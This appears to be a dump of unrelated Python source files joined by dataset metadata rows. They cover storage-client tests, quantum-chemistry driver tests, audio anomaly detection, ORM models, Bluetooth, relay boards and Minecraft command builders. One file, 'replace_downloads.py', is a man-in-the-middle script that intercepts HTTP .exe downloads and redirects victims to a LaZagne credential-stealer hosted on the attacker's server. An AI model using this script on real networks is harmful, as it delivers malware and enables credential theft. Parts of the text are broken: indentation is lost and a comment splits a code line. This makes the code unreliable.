# The mock SSH server can be accessed at 0.0.0.0.
ip = '0.0.0.0'
else:
parsed_3par_url = urlparse(self.url_3par)
ip = parsed_3par_url.hostname.split(':').pop()
try:
# Now that we don't do keep-alive, the conn_timeout needs to
# be set high enough to avoid sometimes slow response in
# the File Persona tests.
self.cl.setSSHOptions(
ip,
self.user,
self.password,
port=self.ssh_port,
conn_timeout=500,
known_hosts_file=self.known_hosts_file,
missing_key_policy=self.missing_key_policy)
except Exception as ex:
print(ex)
self.fail("failed to start ssh client")
# Setup remote copy target
if self.run_remote_copy:
parsed_3par_url = urlparse(self.secondary_url_3par)
ip = parsed_3par_url.hostname.split(':').pop()
self.secondary_cl = client.HPE3ParClient(self.secondary_url_3par)
try:
self.secondary_cl.setSSHOptions(
ip,
self.secondary_user,
self.secondary_password,
port=self.ssh_port,
conn_timeout=500,
known_hosts_file=self.known_hosts_file,
missing_key_policy=self.missing_key_policy)
except Exception as ex:
print(ex)
self.fail("failed to start ssh client")
self.secondary_cl.login(self.secondary_user,
self.secondary_password)
if self.debug:
self.cl.debug_rest(True)
self.cl.login(self.user, self.password)
if not self.port:
ports = self.cl.getPorts()
ports = [p for p in ports['members']
if p['linkState'] == 4 and # Ready
('device' not in p or not p['device']) and
p['mode'] == self.cl.PORT_MODE_TARGET]
self.port = ports[0]['portPos']
def tearDown(self):
self.cl.logout()
if self.run_remote_copy:
self.secondary_cl.logout()
if self.unitTest:
self.mockServer.kill()
if self.withSSH:
self.mockSshServer.kill()
def print_header_and_footer(func):
"""Decorator to print header and footer for unit tests."""
@wraps(func)
def wrapper(*args, **kwargs):
test = args[0]
test.printHeader(unittest.TestCase.id(test))
result = func(*args, **kwargs)
test.printFooter(unittest.TestCase.id(test))
return result
return wrapper
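    # Usage sketch (hypothetical subclass and test name): decorating a test method
    # prints its id before and after the run:
    #
    #   class HPE3ParClientVolumeTestCase(HPE3ParClientBaseTestCase):
    #       @HPE3ParClientBaseTestCase.print_header_and_footer
    #       def test_create_volume(self):
    #           ...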
def printHeader(self, name):
print("\n##Start testing '%s'" % name)
def printFooter(self, name):
print("##Completed testing '%s\n" % name)
def findInDict(self, dic, key, value):
for i in dic:
if key in i and i[key] == value:
return True
| 2.171875 | 2 |
test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | 0 | 11372 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Driver HDF5 """
import os
import pathlib
import shutil
import tempfile
import unittest
import warnings
from test import QiskitNatureTestCase
from test.drivers.second_quantization.test_driver import TestDriver
from qiskit_nature.drivers.second_quantization import HDF5Driver
from qiskit_nature.drivers import QMolecule
from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult
class TestDriverHDF5(QiskitNatureTestCase, TestDriver):
"""HDF5 Driver tests."""
def setUp(self):
super().setUp()
driver = HDF5Driver(
hdf5_input=self.get_resource_path(
"test_driver_hdf5.hdf5", "drivers/second_quantization/hdf5d"
)
)
self.driver_result = driver.run()
def test_convert(self):
"""Test the legacy-conversion method."""
legacy_file_path = self.get_resource_path(
"test_driver_hdf5_legacy.hdf5", "drivers/second_quantization/hdf5d"
)
with self.subTest("replace=True"):
# pylint: disable=consider-using-with
tmp_file = tempfile.NamedTemporaryFile(delete=False, suffix=".hdf5")
tmp_file.close()
os.unlink(tmp_file.name)
shutil.copy(legacy_file_path, tmp_file.name)
try:
driver = HDF5Driver(tmp_file.name)
# replacing file won't trigger deprecation on run
driver.convert(replace=True)
driver.run()
finally:
os.unlink(tmp_file.name)
msg_mol_ref = (
"The HDF5Driver.run with legacy HDF5 file method is deprecated as of version 0.4.0 "
"and will be removed no sooner than 3 months after the release "
". Your HDF5 file contains the legacy QMolecule object! You should "
"consider converting it to the new property framework. See also HDF5Driver.convert."
)
with self.subTest("replace=False"):
# pylint: disable=consider-using-with
tmp_file = tempfile.NamedTemporaryFile(delete=False, suffix=".hdf5")
tmp_file.close()
new_file_name = pathlib.Path(tmp_file.name).with_name(
str(pathlib.Path(tmp_file.name).stem) + "_new.hdf5"
)
os.unlink(tmp_file.name)
shutil.copy(legacy_file_path, tmp_file.name)
try:
driver = HDF5Driver(tmp_file.name)
# not replacing file will trigger deprecation on run
driver.convert(replace=False)
with warnings.catch_warnings(record=True) as c_m:
warnings.simplefilter("always")
driver.run()
self.assertEqual(str(c_m[0].message), msg_mol_ref)
# using new file won't trigger deprecation
HDF5Driver(new_file_name).run()
finally:
os.unlink(tmp_file.name)
os.unlink(new_file_name)
class TestDriverHDF5Legacy(QiskitNatureTestCase, TestDriver):
"""HDF5 Driver legacy file-support tests."""
def setUp(self):
super().setUp()
hdf5_file = self.get_resource_path(
"test_driver_hdf5_legacy.hdf5", "drivers/second_quantization/hdf5d"
)
        # QMolecule is used directly here to avoid triggering the deprecation warning on the
        # HDF5Driver.run method, which is exercised by test_convert instead.
        # Deprecation messages are shown only once, so triggering the warning here first
        # could prevent test_convert from observing it.
molecule = QMolecule(hdf5_file)
molecule.load()
warnings.filterwarnings("ignore", category=DeprecationWarning)
self.driver_result = ElectronicStructureDriverResult.from_legacy_driver_result(molecule)
warnings.filterwarnings("default", category=DeprecationWarning)
if __name__ == "__main__":
unittest.main()
| 2.21875 | 2 |
01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 0 | 11373 | <gh_stars>0
########################################################################
# import default libraries
########################################################################
import os
import csv
import sys
import gc
########################################################################
########################################################################
# import additional libraries
########################################################################
import numpy as np
import scipy.stats
import torch
import torch.nn as nn
# from import
from tqdm import tqdm
from sklearn import metrics
try:
from sklearn.externals import joblib
except:
import joblib
# original lib
import common as com
from pytorch_model import AutoEncoder
########################################################################
########################################################################
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
# output csv file
########################################################################
def save_csv(save_file_path,
save_data):
with open(save_file_path, "w", newline="") as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(save_data)
########################################################################
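########################################################################
# hedged usage sketch (not part of the original baseline)
########################################################################
def example_decision_threshold(shape_hat, loc_hat, scale_hat, q=0.9):
    """Restate the threshold rule used in the main loop below: the decision
    threshold is the q-th percentile of a gamma distribution fitted to the
    training anomaly scores. The default q=0.9 is an illustrative value;
    the real value comes from param["decision_threshold"]."""
    return scipy.stats.gamma.ppf(q=q, a=shape_hat, loc=loc_hat, scale=scale_hat)
########################################################################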
########################################################################
# main 01_test.py
########################################################################
if __name__ == "__main__":
####################################################################
# set device
####################################################################
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device : {}".format(device))
####################################################################
# check mode
# "development": mode == True
# "evaluation": mode == False
mode = com.command_line_chk()
if mode is None:
sys.exit(-1)
# make output result directory
os.makedirs(param["result_directory"], exist_ok=True)
# load base directory
dirs = com.select_dirs(param=param, mode=mode)
# initialize lines in csv for AUC and pAUC
csv_lines = []
if mode:
performance_over_all = []
# loop of the base directory
for idx, target_dir in enumerate(dirs):
print("\n===========================")
print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs)))
machine_type = os.path.split(target_dir)[1]
print("============== MODEL LOAD ==============")
# load model file
model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"],
machine_type=machine_type)
if not os.path.exists(model_file):
com.logger.error("{} model not found ".format(machine_type))
sys.exit(-1)
input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"]
model = AutoEncoder(input_channel).to(device)
model.eval()
if device.type == "cuda":
model.load_state_dict(torch.load(model_file))
elif device.type == "cpu":
model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu")))
# load anomaly score distribution for determining threshold
score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"],
machine_type=machine_type)
shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path)
# determine threshold for decision
decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat)
if mode:
# results for each machine type
csv_lines.append([machine_type])
csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"])
performance = []
dir_names = ["source_test", "target_test"]
for dir_name in dir_names:
#list machine id
section_names = com.get_section_names(target_dir, dir_name=dir_name)
for section_name in section_names:
# load test file
files, y_true = com.file_list_generator(target_dir=target_dir,
section_name=section_name,
dir_name=dir_name,
mode=mode)
# setup anomaly score file path
anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
anomaly_score_list = []
# setup decision result file path
decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
decision_result_list = []
print("\n============== BEGIN TEST FOR A SECTION ==============")
y_pred = [0. for k in files]
for file_idx, file_path in tqdm(enumerate(files), total=len(files)):
try:
data = com.file_to_vectors(file_path,
n_mels=param["feature"]["n_mels"],
n_frames=param["feature"]["n_frames"],
n_fft=param["feature"]["n_fft"],
hop_length=param["feature"]["hop_length"],
power=param["feature"]["power"])
                    except Exception:
                        com.logger.error("File broken!!: {}".format(file_path))
                        continue  # skip unreadable files instead of reusing stale data
data = torch.tensor(data, dtype=torch.float32).to(device)
reconst = model(data)
mseloss = nn.functional.mse_loss(data.detach(), reconst.detach())
y_pred[file_idx] = mseloss.item()
# store anomaly scores
anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]])
# store decision results
if y_pred[file_idx] > decision_threshold:
decision_result_list.append([os.path.basename(file_path), 1])
else:
decision_result_list.append([os.path.basename(file_path), 0])
# output anomaly scores
save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
# output decision results
save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
com.logger.info("decision result -> {}".format(decision_result_csv))
if mode:
# append AUC and pAUC to lists
auc = metrics.roc_auc_score(y_true, y_pred)
p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"])
tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel()
prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1])
performance.append([auc, p_auc, prec, recall, f1])
performance_over_all.append([auc, p_auc, prec, recall, f1])
com.logger.info("AUC : {}".format(auc))
com.logger.info("pAUC : {}".format(p_auc))
com.logger.info("precision : {}".format(prec))
com.logger.info("recall : {}".format(recall))
com.logger.info("F1 score : {}".format(f1))
print("\n============ END OF TEST FOR A SECTION ============")
if mode:
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance, dtype=float), axis=0)
csv_lines.append(["arithmetic mean", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean", ""] + list(hmean_performance))
csv_lines.append([])
del data
del model
if mode:
csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"])
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0)
csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance))
csv_lines.append([])
# output results
result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"])
com.logger.info("results -> {}".format(result_path))
save_csv(save_file_path=result_path, save_data=csv_lines)
| 1.8125 | 2 |
Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 0 | 11374 | <gh_stars>0
#!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
# Configuration (hoisted from the inline "CHOOSE/Input ... HERE" comments so
# the script parses and runs): adjust these values to your own setup.
HTTP_PORT = 80  # port to intercept: 80, or 10000 as suggested in the original comments
WEB_SERVER_IP = "10.0.2.15"  # web server hosting the replacement file
REDIRECT_RESPONSE = ("HTTP/1.1 301 Moved Permanently\n"
                     "Location: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")

ack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will be using in line 22/29.
Do not forget to modify line 24 and 35 and uncomment them afterwards."""
    scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == HTTP_PORT:
# print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
print("Captured .exe file in the Request packet.")
ack_list.append(scapy_packet[scapy.TCP].ack)
# print(scapy_packet.show())
        elif scapy_packet[scapy.TCP].sport == HTTP_PORT:
# print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing the file.")
# print(scapy_packet.show())
                modified_packet = set_load(scapy_packet, REDIRECT_RESPONSE)
packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
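
# Note (hedged, not part of the original script): netfilterqueue only receives
# packets that iptables has diverted to queue 0, so a rule such as
#   iptables -I FORWARD -j NFQUEUE --queue-num 0   (for forwarded/MITM traffic)
# or the equivalent -I INPUT / -I OUTPUT rules for local testing is assumed to
# be in place before running this script.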
| 2.90625 | 3 |
tmpmodels.py | firaan1/iamgrateful | 0 | 11375 | <reponame>firaan1/iamgrateful
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean
from sqlalchemy.orm import relation, sessionmaker, relationship, backref
from datetime import datetime
import os
# Database
DATABASE = 'sqlite:///db.sqlite3'
DEBUG = True
# ORM
Base = declarative_base()
# model
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True, autoincrement=True)
passcode = Column(Integer, nullable=False)
question = Column(String)
answer = Column(String)
def __init__(self, passcode):
self.passcode = passcode
def __repr__(self):
        return '<User %s>' % self.id
class Memory(Base):
__tablename__ = 'memory'
id = Column(Integer, primary_key=True, autoincrement=True)
happiness = Column(Integer)
    date = Column(DateTime, default=datetime.now)  # callable, so each row gets its own timestamp
things = relationship('Thing', secondary = 'memory_thing_link')
def __repr__(self):
        return '<Memory %s>' % self.date
class Thing(Base):
__tablename__ = 'thing'
id = Column(Integer, primary_key=True, autoincrement=True)
text = Column(Text)
def __repr__(self):
        return '<Item %s>' % self.text
class MemoryThingLink(Base):
__tablename__ = 'memory_thing_link'
memory_id = Column(Integer, ForeignKey('memory.id'), primary_key=True)
thing_id = Column(Integer, ForeignKey('thing.id'), primary_key=True)
# if __name__ == '__main__':
# connection
engine = create_engine(DATABASE, echo = DEBUG)
session_factory = sessionmaker(bind = engine)
session = session_factory()
# initialize database
if not os.path.exists('db.sqlite3'):
Base.metadata.create_all(engine)
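
# Hedged usage sketch (not part of the original file): persist one memory with
# two gratitude entries using the session created above.
def example_add_memory():
    memory = Memory(happiness=8)
    memory.things = [Thing(text='morning coffee'), Thing(text='a long walk')]
    session.add(memory)
    session.commit()
    return memory.id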
| 2.84375 | 3 |
doc/filters.py | CargobaseDev/openpyxl | 6 | 11376 | from openpyxl import Workbook
wb = Workbook()
ws = wb.active
data = [
["Fruit", "Quantity"],
["Kiwi", 3],
["Grape", 15],
["Apple", 3],
["Peach", 3],
["Pomegranate", 3],
["Pear", 3],
["Tangerine", 3],
["Blueberry", 3],
["Mango", 3],
["Watermelon", 3],
["Blackberry", 3],
["Orange", 3],
["Raspberry", 3],
["Banana", 3]
]
for r in data:
ws.append(r)
ws.auto_filter.ref = "A1:B15"
ws.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"])
ws.auto_filter.add_sort_condition("B2:B15")
wb.save("filtered.xlsx")
| 2.78125 | 3 |
Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | 0 | 11377 | from bleak import BleakClient
import asyncio
import functools
notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19)
def callback(sender, data, mac_address):
#data = bytearray(data)
dataint = int.from_bytes(data, byteorder='little', signed=True)
print(mac_address, dataint)
def run(addresses):
loop = asyncio.get_event_loop()
tasks = asyncio.gather(*(connect_to_device(address) for address in addresses))
loop.run_until_complete(tasks)
async def connect_to_device(address):
print("starting", address, "loop")
async with BleakClient(address, timeout=10.0) as client:
print("connect to", address)
try:
#model_number = await client.read_gatt_char(address)
await client.start_notify(notify_uuid, functools.partial(callback, mac_address=address))
await asyncio.sleep(1000.0)
await client.stop_notify(notify_uuid)
except Exception as e:
print(e)
print("disconnect from", address)
if __name__ == "__main__":
run(
["96E8409A-F2EB-4029-B3DC-615FADE0C838","D31CB0CA-890E-476B-80D9-80ED8A3AA69A"]
)
| 2.453125 | 2 |
binary search tree insertion.py | buhuhaha/python | 0 | 11378 | <filename>binary search tree insertion.py<gh_stars>0
class Node:
left = right = None
def __init__(self, data):
self.data = data
def inorder(root):
if root is None:
return
inorder(root.left)
print(root.data, end=' ')
inorder(root.right)
def insert(root, key):
if root is None:
return Node(key)
if key < root.data:
root.left = insert(root.left, key)
else:
root.right = insert(root.right, key)
return root
def constructBST(keys):
root = None
for key in keys:
root = insert(root, key)
return root
if __name__ == '__main__':
keys = [15, 10, 20, 8, 12, 16, 25]
root = constructBST(keys)
inorder(root) | 3.71875 | 4 |
tests/test_env_helpers.py | Azraeht/py-ndebug | 0 | 11379 | <reponame>Azraeht/py-ndebug
from ndebug import env_helpers
def test_inspect_ops(mocker):
mocker.patch.dict('os.environ', {'DEBUG_COLORS': 'no',
'DEBUG_DEPTH': '10',
'DEBUG_SHOW_HIDDEN': 'enabled',
'DEBUG_SOMETHING': 'null'})
actual = env_helpers.options()
assert actual == {'colors': False, 'depth': 10, 'show_hidden': True, 'something': None}
def test_load_and_save():
actual = env_helpers.load()
assert actual == ''
env_helpers.save('test:data')
actual = env_helpers.load()
assert actual == 'test:data'
| 2.09375 | 2 |
relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | 1 | 11380 | #!/usr/bin/python
'''*****************************************************************************************************************
Seeed Studio Relay Board Library V2
Test Application #2
By <NAME> (https://www.johnwargo.com)
********************************************************************************************************************'''
import sys
import time
from seeed_relay_v1 import Relay
def process_loop():
# turn all of the relays on
relay.all_on()
relay.print_status_all()
# wait a second
time.sleep(1)
# turn all of the relays off
relay.all_off()
relay.print_status_all()
# wait a second
time.sleep(1)
# now cycle each relay every second in an infinite loop
while True:
# test the on/off methods
print('Testing on/off methods')
for i in range(1, 5):
relay.on(i)
relay.print_status_all()
time.sleep(1)
relay.off(i)
relay.print_status_all()
time.sleep(1)
# test the toggle method
print('Testing the toggle methods')
for i in range(1, 5):
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
print('Repeating loop')
# Now see what we're supposed to do next
if __name__ == "__main__":
# Create the relay object
relay = Relay()
try:
process_loop()
except KeyboardInterrupt:
print("\nExiting application")
# turn off all of the relays
relay.all_off()
# exit the application
sys.exit(0)
| 2.859375 | 3 |
quasar/sa_database.py | stevencyrway/quasar | 12 | 11381 | <reponame>stevencyrway/quasar
import os
from sqlalchemy import bindparam, create_engine, exc
from sqlalchemy.dialects.postgresql.json import JSONB
from sqlalchemy.engine.url import URL
from sqlalchemy.sql import text
from .utils import log, logerr
# Setup SQL Alchemy vars.
pg_opts = {
'drivername': os.getenv('PG_DRIVER'),
'username': os.getenv('PG_USER'),
'password': os.getenv('<PASSWORD>'),
'host': os.getenv('PG_HOST'),
'port': os.getenv('PG_PORT'),
'database': os.getenv('PG_DATABASE')
}
pg_ssl = os.getenv('PG_SSL')
class Database:
def __init__(self, options={}):
pg_opts.update(options)
self.connect()
def connect(self):
# Setup SQL Alchemy postgres connection.
try:
engine = create_engine(URL(**pg_opts),
connect_args={'sslmode': pg_ssl})
self.engine = engine
self.conn = engine.connect()
except exc.InterfaceError as e:
log("Couldnt't establsh DB connection!")
log("Error is:")
logerr(e)
def disconnect(self):
self.conn.close()
return self.conn
def query(self, query):
return self.conn.execute(query)
def query_str(self, query, record):
# Run query with string substitution using ':thisvar' SQL Alchemy
# standard based formatting. e.g.
# query = 'INSERT :bar into foo;', record = {bar: 'baz'}
run_query = text(query)
return self.conn.execute(run_query, record)
def query_json(self, query, record, col_name):
# Based on the post https://stackoverflow.com/a/46031085, this
# function forces a JSONB binding to insert JSON record types
# into a table using SQL Alchemy.
# This function is tightly coupled with the log_event function
# in the cio_queue.py code. Hacky solution to get
# https://www.pivotaltracker.com/story/show/172585118 resolved.
run_query = text(query)
return self.conn.execute(
run_query.bindparams(bindparam(col_name, type_=JSONB)), record)
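
# Hedged usage sketch (not part of the original module): insert a JSON payload
# through Database.query_json so SQLAlchemy binds it as JSONB. The table and
# column names below are illustrative only.
def example_log_event(db, payload):
    query = "INSERT INTO events (event) VALUES (:event)"
    return db.query_json(query, {'event': payload}, 'event')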
| 2.59375 | 3 |
commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 1 | 11382 | import abc
class CommandBlock:
def __init__(self, command, conditional=True, mode='CHAIN', auto=True,
opposite=False, single_use=True):
self.command = command
self.cond = conditional
self.mode = mode
self.auto = auto
self.opposite = opposite
self.single_use = single_use
def resolve(self, scope):
return self.command.resolve(scope)
class Resolvable(metaclass=abc.ABCMeta):
@abc.abstractmethod
def resolve(self, scope):
pass
class SimpleResolve(Resolvable):
def __init__(self, *args):
self.args = args
def resolve(self, scope):
return ' '.join(map(lambda el: el.resolve(scope) \
if isinstance(el, Resolvable) \
else el, self.args))
class Command(Resolvable):
pass
class EntityRef(Resolvable):
def is_single_entity(self, scope):
raise NotImplementedError()
@property
def ref(self):
return EntityReference(self)
class ObjectiveRef(Resolvable):
def __init__(self, name):
assert type(name) == str
self.objective = name
def resolve(self, scope):
return scope.objective(self.objective)
class NameRef(EntityRef):
def __init__(self, name):
assert type(name) == str
self.name = name
@property
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return self.name
class ScoreRef:
def __init__(self, target, objective):
assert isinstance(target, EntityRef)
assert isinstance(objective, ObjectiveRef)
self.target = target
self.objective = objective
def resolve_pair(self, scope):
return '%s %s' % (self.target.resolve(scope),
self.objective.resolve(scope))
class Var(ScoreRef):
def __init__(self, nameref):
super().__init__(GlobalEntity, ObjectiveRef(nameref))
def make_selector(selector, **kwargs):
output = '@' + selector
if not kwargs:
return output
def str_pairs(items):
output = []
for key, value in items:
if type(value) == dict:
value = '{%s}' % str_pairs(value.items())
output.append('%s=%s' % (key, value))
return ','.join(output)
return '%s[%s]' % (output, str_pairs(kwargs.items()))
class Selector(EntityRef):
def __init__(self, type, args=None):
assert type in 'aespr'
self.type = type
assert args is None or isinstance(args, SelectorArgs)
self.args = args
def resolve_params(self, scope):
if not self.args:
return {}
return self.args.resolve(scope)
def is_single_entity(self, scope):
if self.type in 'spr':
return True
params = self.resolve_params(scope)
return 'limit' in params and params['limit'] == '1'
def resolve(self, scope):
return make_selector(self.type, **self.resolve_params(scope))
class _GlobalEntity(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.global_entity()
GlobalEntity = _GlobalEntity()
class _PosUtil(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.pos_util_entity()
PosUtil = _PosUtil()
class NbtPath(Resolvable):
def __init__(self, path):
self.path = path
def subpath(self, childpath):
# TODO path validation
return self.__class__(self.path + childpath)
def resolve(self, scope):
return self.path
def __eq__(self, other):
if type(other) != type(self):
return False
return self.path == other.path
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.path)
class Path(NbtPath):
def resolve(self, scope):
return scope.custom_nbt_path(self.path)
class ArrayPath(Path):
def __init__(self, index=None, key=None):
sub = '[%d]' % index if index is not None else ''
assert key is None or index is not None
sub += '.%s' % key if key else ''
super().__init__('%s%s' % (self.name, sub))
def subpath(self, childpath):
# Don't use our constructor
return Path(self.path).subpath(childpath)
class StackPath(ArrayPath):
name = 'stack'
def StackFrame(index):
class StackFramePath(ArrayPath):
name = 'stack[%d].stack' % (-index - 1)
return StackFramePath
StackFrameHead = StackFrame(0)
class GlobalPath(ArrayPath):
name = 'globals'
class Cmd(Command):
def __init__(self, cmd):
self.command = cmd
def resolve(self, scope):
return self.command
class Execute(Command):
def __init__(self, chain):
self.chain = SimpleResolve(*chain._components)
def resolve(self, scope):
return 'execute %s' % self.chain.resolve(scope)
def ensure_selector(sel_arg):
assert isinstance(sel_arg, EntityRef), sel_arg
return sel_arg
class ExecuteChain:
def __init__(self):
self._components = []
self.can_terminate = False
def add(self, *args):
for arg in args:
if type(arg) in [str, int, float]:
self._components.append(str(arg))
elif isinstance(arg, Resolvable):
self._components.append(arg)
else:
assert False, type(arg)
return self
def run(self, cmd):
self.add('run', cmd)
return Execute(self)
def finish(self):
assert self.can_terminate
return Execute(self)
def as_entity(self, select_arg):
self.can_terminate = False
return self.add('as', ensure_selector(select_arg))
def at(self, select_arg):
self.can_terminate = False
return self.add('at', ensure_selector(select_arg))
def at_pos(self, pos):
self.can_terminate = False
return self.add('positioned', pos)
def at_entity_pos(self, select_arg):
self.can_terminate = False
return self.add('positioned', 'as', ensure_selector(select_arg))
def align(self, axes):
self.can_terminate = False
assert ''.join(axis for axis in axes if axis in 'xyz') == axes
return self.add('align', axes)
def facing(self, pos):
self.can_terminate = False
return self.add('facing', pos)
def facing_entity(self, select_arg, feature):
self.can_terminate = False
assert feature == 'eyes' or feature == 'feet'
return self.add('facing', 'entity', ensure_selector(select_arg), \
feature)
def rotated(self, y, x):
self.can_terminate = False
return self.add('rotated', y, x)
def rotated_as_entity(self, select_arg):
self.can_terminate = False
return self.add('rotated', 'as', ensure_selector(select_arg))
def anchored(self, anchor):
self.can_terminate = False
assert anchor == 'feet' or anchor == 'eyes'
return self.add('anchored', anchor)
def cond(self, cond_type):
self.can_terminate = False
assert cond_type == 'if' or cond_type == 'unless'
return ExecuteChain.Cond(self, cond_type)
class Cond:
def add(self, *args):
self.parent.can_terminate = True
return self.parent.add(*((self.cond_type,) + args))
def __init__(self, parent, cond_type):
self.parent = parent
self.cond_type = cond_type
def entity(self, entityref):
return self.add('entity', ensure_selector(entityref))
def score(self, targetref, operator, sourceref):
assert isinstance(targetref, ScoreRef)
assert isinstance(sourceref, ScoreRef)
assert operator in ['<', '<=', '=', '>=', '>']
return self.add('score', targetref.target, targetref.objective,
operator, sourceref.target, sourceref.objective)
def score_range(self, scoreref, range):
assert isinstance(scoreref, ScoreRef)
assert isinstance(range, ScoreRange)
return self.add('score', scoreref.target, scoreref.objective,
'matches', range)
def block(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
return self.add('block', pos, block)
def blocks_match(self, begin, end, dest, type):
assert type in ['all', 'masked']
return self.add('blocks', begin, end, dest, type)
def store(self, store_type):
assert store_type in ['result', 'success']
self.can_terminate = False
return ExecuteChain.Store(self, store_type)
class Store:
def add(self, *args):
return self.parent.add(*(('store', self.store_type) + args))
def __init__(self, parent, store_type):
self.parent = parent
self.store_type = store_type
def score(self, scoreref):
assert isinstance(scoreref, ScoreRef)
return self.add('score', scoreref.target, scoreref.objective)
def entity(self, target, path, data_type, scale=1):
return self.add('entity', ensure_selector(target), \
path, data_type, scale)
def bossbar(self, bar, attr):
assert attr in ['value', 'max']
return self.add('bossbar', bar, attr)
class BlockOrEntityRef(Resolvable):
pass
class EntityReference(BlockOrEntityRef):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
assert self.target.is_single_entity(scope)
return 'entity %s' % self.target.resolve(scope)
class WorldPos(Resolvable):
def __init__(self, x, y, z, block_pos=False):
is_anchor = self._check_coord(x, True, not block_pos)
was_anchor = self._check_coord(y, is_anchor, not block_pos)
is_anchor = self._check_coord(z, was_anchor, not block_pos)
if was_anchor:
assert is_anchor
self.x, self.y, self.z = x, y, z
self.block_pos = block_pos
def _check_coord(self, val, allow_anchor, allow_float):
if isinstance(val, AnchorRelCoord):
assert allow_anchor
return True
if type(val) == float:
assert allow_float
return False
if type(val) == int:
return False
if isinstance(val, WorldRelCoord):
return False
assert False, val
@property
def ref(self):
return BlockReference(self)
def resolve(self, scope):
return '%s %s %s' % (self.x, self.y, self.z)
class RelativeCoord:
def __init__(self, val):
self.str = self.marker
if type(val) == int:
if val != 0:
self.str += '%d' % val
elif type(val) == float:
if val != 0.0:
# https://stackoverflow.com/a/2440786
self.str += ('%f' % val).rstrip('0').rstrip('.')
else:
assert False, val
self.val = val
def __str__(self):
return self.str
class WorldRelCoord(RelativeCoord):
marker = '~'
class AnchorRelCoord(RelativeCoord):
marker = '^'
class BlockReference(BlockOrEntityRef):
def __init__(self, pos):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
